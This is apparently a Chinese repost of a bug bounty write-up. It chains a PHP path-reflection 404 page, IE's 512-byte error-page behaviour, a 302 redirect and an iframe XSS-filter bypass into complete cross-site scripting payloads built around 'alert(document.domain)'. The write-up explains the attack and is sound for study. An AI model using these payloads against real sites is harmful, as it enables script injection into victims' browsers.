2. 程式人生 > >bug bounty writeup

bug bounty writeup

阿新 發佈:2018-12-30

Demo Code:

<?php
header('HTTP/1.1 404 Not Found');
$path = trim($_SERVER['PATH_INFO'],"/");
$limit_pos = strrpos(trim($path,"/"),'/');
$action_name = substr($path, $limit_pos);
$controller_name = str_replace("/","\\",substr($path, 0, $limit_pos));
echo "Action: " . $action_name . " has controller: \\" . $controller_name;
?>

1、404頭的問題
如果404響應返回內容小於512位元組,則使用IE自帶的404頁面

所以新增多個字元即可顯示出來內容

2、url path問題 -> urlencode編碼
瀏覽器下訪問直接訪問都會進行url編碼,

但是在IE下,使用3xx跳轉後可以繞過

<?php
header("Location: "http://".$_GET["host"]."/".urldecode($_GET["payload"]),true,302);
http://evil.i/test/xss/12.php?host=lemon.i/test/xss/13.php&payload=<>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<>

但是可以看到ie filter限制了

3、bypass IE filter
IE edge / 11下這樣利用

<iframe onload="contentWindow[0].location='//vulnerabledoma.in/bypass/text?q=<script>alert(location)</script>'" src="//vulnerabledoma.in/bypass/text?q=%3Ciframe%3E"></iframe>

所以換到目標,則payload為如下:

<iframe src="http://evil.i/test/xss/12.php?host=lemon.i/test/xss/13.php&payload=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<iframe>" onload="contentWindow[0].location='http://evil.i/test/xss/12.php?host=lemon.i/test/xss/13.php&payload=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<img src=1 onerror=alert(1)>'"></iframe>

但是又被一些坑點限制了:

無空格(會被url->%20)
無/(會被轉換為\)

4、bypass限制
通過下面的payload可繞過

<svg><script>alert(document.domain)<b>

最終payload:

<iframe src="http://evil.i/test/xss/12.php?host=lemon.i/test/xss/13.php&payload=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<iframe>" onload="contentWindow[0].location='http://evil.i/test/xss/12.php?host=lemon.i/test/xss/13.php&payload=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<svg><script>alert(document.domain)<b>'"></iframe>

Referer

相關推薦

bug bounty writeup

Demo Code: <?php header('HTTP/1.1 404 Not Found'); $path = trim($_SERVER['PATH_INFO'],"/"); $limit_pos = strrpos(trim($path,"/"),'/'); $action_name = s

Bug Bounty平臺的終極指南

似乎沒有一個星期過去沒有新聞文章,一些公司遭到******。即便是Facebook,蘋果或谷歌等科技巨頭也無法免受網路犯罪分子的***。事實不言自明:根據戰略與國際研究中心編制的報告,僅2018年就有近600億美元的網路犯罪丟失。因此,全球網路安全支出在過去兩年中增長了17%,預計2018年將創下96億美

How to become a successful bug bounty hunter

如果你夢想成為賞金獵人,你的夢想就會成真 - 不要把你的名字變成“狗”或者在Mos Eisley酒吧面對Han Solo。 成為一個bug賞金獵人:一個有錢尋找軟體和網站漏洞的黑客。 任何具有計算機技能和高度好奇心的人都可以成為漏洞的成功者。 你開始時可以年輕或年老。 主要要求是你需要不斷學習。 此外,如果

【10.13】Bug Bounty Write-up 總結

今天慣例郵箱收到了Twitter的郵件提醒有新的post,這種郵件每天都能收到幾封,正好看到一個Bug Bounty的write up,比較感興趣,看起來也在我的理解範圍之內,這裡對這篇write up和另一篇一起做一個總結,希望能對自己對於web security的學習和bug bounty的路程有所幫助。

【10.14】Bug Bounty Write-up總結

我很喜歡今天的看到的write-up,因為作者是針對他對一個網站整體進行漏洞挖掘的過程寫的,內容包括幾個不同的漏洞,從中能夠學習到怎樣系統性的挖掘漏洞。 從文中可以看到作者從3000+個mail.ru的子域名中,按順序一個個進行漏洞挖掘。 1. Improper authentication 這個漏洞存在

Four years of the GitHub Security Bug Bounty

Last month GitHub celebrated the fourth year of our Security Bug Bounty program. As we’ve done in the past, we’re sharing some details and highlights fr

Launching the Netflix Public Bug Bounty Program

Launching the Netflix Public Bug Bounty ProgramNetflix’s goal is to deliver joy to our 117+ million members around the world, and it’s the security team’s

修復Extjs5.1.4表格設置enableTextSelection: true之後,文本仍然不能選擇的BUG

over del ble nav targe find ret lec parent 如果您發現其他版本也有此BUG,可參照此方式進行修復,源代碼中多了一句攔截mousedown事件的代碼mousedownEvent.preventDefault()造成的。 Ext.def

a標簽 可能會出現的bug

ref 當前頁 屬性 定位問題 實現 use 位置 你會 nload 在項目中a標簽遇到過的問題 發現問題:a標簽包裝的按鈕, 如果這個按鈕在頁面滾動後出現,你點擊後,頁面會定位到滾動以前的位置,但是我並不想要這種效果。 分析問題並嘗試: 一開始以為是光標定位問題,用doc

日程管理(bug report)

studio get pen 效果 角度 自定義 用戶登錄 回來 而是 1.退出程序停留在歡迎界面 bug Description: 測試環境:win10、工具android studio; 測試步驟: 描述:當點開程序時,不是直接到登錄界面,會有一個可自定義化的歡迎界

修復百度編輯器插入視頻的bug

問題 tar groovy util 實現 eve width 告訴 tps 修復百度編輯器插入視頻的bug,可實時預覽視頻,可修改到支持手機查看視頻開程序員的淘寶店!尋找開源技術服務夥伴!>>> 站在前人的肩膀上我們就可以站的更高,看得更遠。所以,請

日程管理app(bug report)

報錯 進行 android 設置 用戶登錄 登錄驗證 理想 運行 rip 一、用戶登錄驗證密碼過短   Description:   測試環境:Android Studio自帶的ADT模擬器(安卓6.0)   準備工作:將工程導入AS,並啟動模擬器進行測試   測試步驟:1

POJ 2586 Y2K Accounting Bug(枚舉大水題)

lin uri ssd 數據丟失 span com reported cpp rem Y2K Accounting Bug Time Limit: 1000MS Memory Limit: 65536K Total Submissions: 1067

團隊用過最好的bug管理軟件-delbug管理

軟件開發 管理軟件 項目開發 管理工具 公司招聘 從事軟件開發10多年,從最開始的寫代碼,過設計,再到現在的技術管理;多年的開發和管理過程中,一直尋找,嘗試,使用缺陷管理工具;目的就是想讓團隊的開發效率高、代碼質量高,項目開發進度可控,風險低。 團隊從最初的QC(Quality

SQLServer · BUG分析 · Agent 鏈接泄露分析(轉載)

空閑 doc ucc object bsp line existing rds 成功 背景 SQLServer Agent作為Windows服務提供給用戶定期執行管理任務,這些任務被稱為Job;考慮應用鏡像的場景如何解決Job同步問題,AWS RDS的做法是不予理會,由

TFrame bug

nbsp 工程 frame 丟失 cnblogs lba ref 工程文件 bsp delphi 10.1.2 工程裏有很多fram 正確的工程文件dproj中fram的定義是 <DCCReference Include="Unit15frame.pas">

寶爺Debug小記——Cocos2d-x(3.13之前的版本)底層BUG導致Spine渲染花屏

lec point ror 排除 再看 加載 莫名奇妙 city .cn 最近在工作中碰到不少棘手的BUG,其中的一個是Spine骨骼的渲染花屏,在戰鬥中派發出大量士兵之後有概率出現花屏閃爍(如下圖所示),這種莫名奇妙且難以重現的BUG最為蛋疼。 前段時間為了提

SCVMM 2012 R2 及應答文件BUG解決

服務器 防火墻 虛擬機 管理員 操作系統 背景: 1. 計劃使用SCVMM 2012 R2自動部署win7 虛擬機模板,VM模板雖然已經使用過很多次,但是客戶端版的OS和服務器端的OS版有一點不一樣,那就是客戶端版的操作系統會默認禁用administrator 賬號,然後必須新建一個管理

0510日重點:原生js修改豆瓣電影api 在angularjs裏運用出現的bug

http ava move var cti tps 上下 console date 用$http.jsonp調用豆瓣電影api,會出現返回數據格式錯誤的bug。在控制器裏加上下面的代碼,才能正常獲取到數據。 function jsonp(url, ca

bug排查小結

解決 roc ssl mysq show mysql 引擎 ces 排查 mysql cpu利用率偏高,並且長時間居高不下。 show processlist 發現有一個單表查詢的sql語句出現的頻率比較高, 這個單表查詢中規中矩,where語句中條件都使用&r